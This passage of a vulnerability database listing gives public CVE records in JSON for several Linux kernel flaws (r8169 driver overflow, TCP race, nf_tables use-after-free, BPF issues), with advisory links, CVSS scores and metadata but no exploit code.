http://www.securityfocus.com/archive/1/505254/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/507985/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/36051third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36327third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/40645third-party-advisory, x_refsource_SECUNIA
http://support.avaya.com/css/P8/documents/100067254x_refsource_CONFIRM
http://secunia.com/advisories/36045third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/0219vdb-entry, x_refsource_VUPEN
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10415vdb-entry, signature, x_refsource_OVAL
http://www.securityfocus.com/bid/35281vdb-entry, x_refsource_BID
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8108vdb-entry, signature, x_refsource_OVAL
https://bugzilla.redhat.com/show_bug.cgi?id=504726x_refsource_CONFIRM
http://lkml.org/lkml/2009/6/8/194mailing-list, x_refsource_MLIST
https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01193.htmlvendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.htmlvendor-advisory, x_refsource_SUSE
http://www.vupen.com/english/advisories/2009/3316vdb-entry, x_refsource_VUPEN
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=fdd7b4c3302c93f6833e338903ea77245eb510b4x_refsource_CONFIRM
http://secunia.com/advisories/35847third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1857vdb-entry, x_refsource_VUPEN
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:13:25.541Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "35265",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35265"
          },
          {
            "name": "DSA-1865",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1865"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://wiki.rpath.com/Advisories:rPSA-2009-0111"
          },
          {
            "name": "37298",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37298"
          },
          {
            "name": "36131",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36131"
          },
          {
            "name": "[oss-security] 20090610 CVE-2009-1389 kernel: r8169: fix crash when large packets are received",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/06/10/1"
          },
          {
            "name": "FEDORA-2009-6883",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01048.html"
          },
          {
            "name": "SUSE-SA:2010:031",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00006.html"
          },
          {
            "name": "FEDORA-2009-6768",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01094.html"
          },
          {
            "name": "37471",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37471"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://support.citrix.com/article/CTX123453"
          },
          {
            "name": "linux-kernel-rtl8169nic-dos(51051)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/51051"
          },
          {
            "name": "MDVSA-2009:148",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:148"
          },
          {
            "name": "[linux-netdev] 20090214 r8169: instant crash if receiving packet larger than MTU",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=linux-netdev\u0026m=123462461713724\u0026w=2"
          },
          {
            "name": "DSA-1844",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1844"
          },
          {
            "name": "USN-807-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/usn-807-1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
          },
          {
            "name": "RHSA-2009:1193",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1193.html"
          },
          {
            "name": "35566",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35566"
          },
          {
            "name": "1023507",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1023507"
          },
          {
            "name": "RHSA-2009:1157",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1157.html"
          },
          {
            "name": "20090724 rPSA-2009-0111-1 kernel",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/505254/100/0/threaded"
          },
          {
            "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
          },
          {
            "name": "36051",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36051"
          },
          {
            "name": "36327",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36327"
          },
          {
            "name": "40645",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/40645"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://support.avaya.com/css/P8/documents/100067254"
          },
          {
            "name": "36045",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36045"
          },
          {
            "name": "ADV-2010-0219",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2010/0219"
          },
          {
            "name": "oval:org.mitre.oval:def:10415",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10415"
          },
          {
            "name": "35281",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/35281"
          },
          {
            "name": "oval:org.mitre.oval:def:8108",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8108"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=504726"
          },
          {
            "name": "[linux-kernel] 20090608 [Security, resend] Instant crash with rtl8169 and large packets",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://lkml.org/lkml/2009/6/8/194"
          },
          {
            "name": "FEDORA-2009-6846",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01193.html"
          },
          {
            "name": "SUSE-SA:2009:038",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.html"
          },
          {
            "name": "ADV-2009-3316",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/3316"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=fdd7b4c3302c93f6833e338903ea77245eb510b4"
          },
          {
            "name": "35847",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35847"
          },
          {
            "name": "ADV-2010-1857",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2010/1857"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-06-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in the RTL8169 NIC driver (drivers/net/r8169.c) in the Linux kernel before 2.6.30 allows remote attackers to cause a denial of service (kernel memory corruption and crash) via a long packet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "35265",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35265"
        },
        {
          "name": "DSA-1865",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1865"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://wiki.rpath.com/Advisories:rPSA-2009-0111"
        },
        {
          "name": "37298",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37298"
        },
        {
          "name": "36131",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36131"
        },
        {
          "name": "[oss-security] 20090610 CVE-2009-1389 kernel: r8169: fix crash when large packets are received",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/06/10/1"
        },
        {
          "name": "FEDORA-2009-6883",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01048.html"
        },
        {
          "name": "SUSE-SA:2010:031",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00006.html"
        },
        {
          "name": "FEDORA-2009-6768",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01094.html"
        },
        {
          "name": "37471",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37471"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://support.citrix.com/article/CTX123453"
        },
        {
          "name": "linux-kernel-rtl8169nic-dos(51051)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/51051"
        },
        {
          "name": "MDVSA-2009:148",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:148"
        },
        {
          "name": "[linux-netdev] 20090214 r8169: instant crash if receiving packet larger than MTU",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://marc.info/?l=linux-netdev\u0026m=123462461713724\u0026w=2"
        },
        {
          "name": "DSA-1844",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1844"
        },
        {
          "name": "USN-807-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/usn-807-1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
        },
        {
          "name": "RHSA-2009:1193",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1193.html"
        },
        {
          "name": "35566",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35566"
        },
        {
          "name": "1023507",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1023507"
        },
        {
          "name": "RHSA-2009:1157",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1157.html"
        },
        {
          "name": "20090724 rPSA-2009-0111-1 kernel",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/505254/100/0/threaded"
        },
        {
          "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
        },
        {
          "name": "36051",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36051"
        },
        {
          "name": "36327",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36327"
        },
        {
          "name": "40645",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/40645"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://support.avaya.com/css/P8/documents/100067254"
        },
        {
          "name": "36045",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36045"
        },
        {
          "name": "ADV-2010-0219",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2010/0219"
        },
        {
          "name": "oval:org.mitre.oval:def:10415",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10415"
        },
        {
          "name": "35281",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/35281"
        },
        {
          "name": "oval:org.mitre.oval:def:8108",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8108"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=504726"
        },
        {
          "name": "[linux-kernel] 20090608 [Security, resend] Instant crash with rtl8169 and large packets",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://lkml.org/lkml/2009/6/8/194"
        },
        {
          "name": "FEDORA-2009-6846",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01193.html"
        },
        {
          "name": "SUSE-SA:2009:038",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.html"
        },
        {
          "name": "ADV-2009-3316",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/3316"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=fdd7b4c3302c93f6833e338903ea77245eb510b4"
        },
        {
          "name": "35847",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35847"
        },
        {
          "name": "ADV-2010-1857",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2010/1857"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2009-1389",
    "datePublished": "2009-06-16T23:00:00",
    "dateReserved": "2009-04-23T00:00:00",
    "dateUpdated": "2024-08-07T05:13:25.541Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3566
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel TCP tcp_setsockopt race condition
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.604Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f49cd2f4d6170d27a2c61f1fecb03d8a70c91f57"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211089"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as problematic, was found in Linux Kernel. This affects the function tcp_getsockopt/tcp_setsockopt of the component TCP Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The identifier VDB-211089 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-362",
              "description": "CWE-362 Race Condition",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f49cd2f4d6170d27a2c61f1fecb03d8a70c91f57"
        },
        {
          "url": "https://vuldb.com/?id.211089"
        }
      ],
      "title": "Linux Kernel TCP tcp_setsockopt race condition",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3566",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.604Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4015
Vulnerability from cvelistv5
Published
2023-09-06 13:52
Modified
2024-08-02 07:17
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:17:11.558Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/0a771f7b266b02d262900c75f1e175c7fe76fec2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "6.4",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Kevin Rich"
        }
      ],
      "datePublic": "2023-07-26T14:48:49+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nOn an error when building a nftables rule, deactivating immediate expressions in nft_immediate_deactivate() can lead unbinding the chain and objects be deactivated but later used.\n\nWe recommend upgrading past commit 0a771f7b266b02d262900c75f1e175c7fe76fec2.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:52:44.724Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2"
        },
        {
          "url": "https://kernel.dance/0a771f7b266b02d262900c75f1e175c7fe76fec2"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4015",
    "datePublished": "2023-09-06T13:52:44.724Z",
    "dateReserved": "2023-07-31T10:37:30.332Z",
    "dateUpdated": "2024-08-02T07:17:11.558Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3541
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF spl2sw_driver.c spl2sw_nvmem_get_mac_address use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.638Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=12aece8b01507a2d357a1861f470e83621fbb6f2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211041"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20221228-0001/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as critical has been found in Linux Kernel. This affects the function spl2sw_nvmem_get_mac_address of the file drivers/net/ethernet/sunplus/spl2sw_driver.c of the component BPF. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211041 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-28T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=12aece8b01507a2d357a1861f470e83621fbb6f2"
        },
        {
          "url": "https://vuldb.com/?id.211041"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20221228-0001/"
        }
      ],
      "title": "Linux Kernel BPF spl2sw_driver.c spl2sw_nvmem_get_mac_address use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3541",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.638Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3533
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF usdt.c parse_usdt_arg memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.207Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=0dc9254e03704c75f2ebc9cbef2ce4de83fba603"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211031"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects the function parse_usdt_arg of the file tools/lib/bpf/usdt.c of the component BPF. The manipulation of the argument reg_name leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211031."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
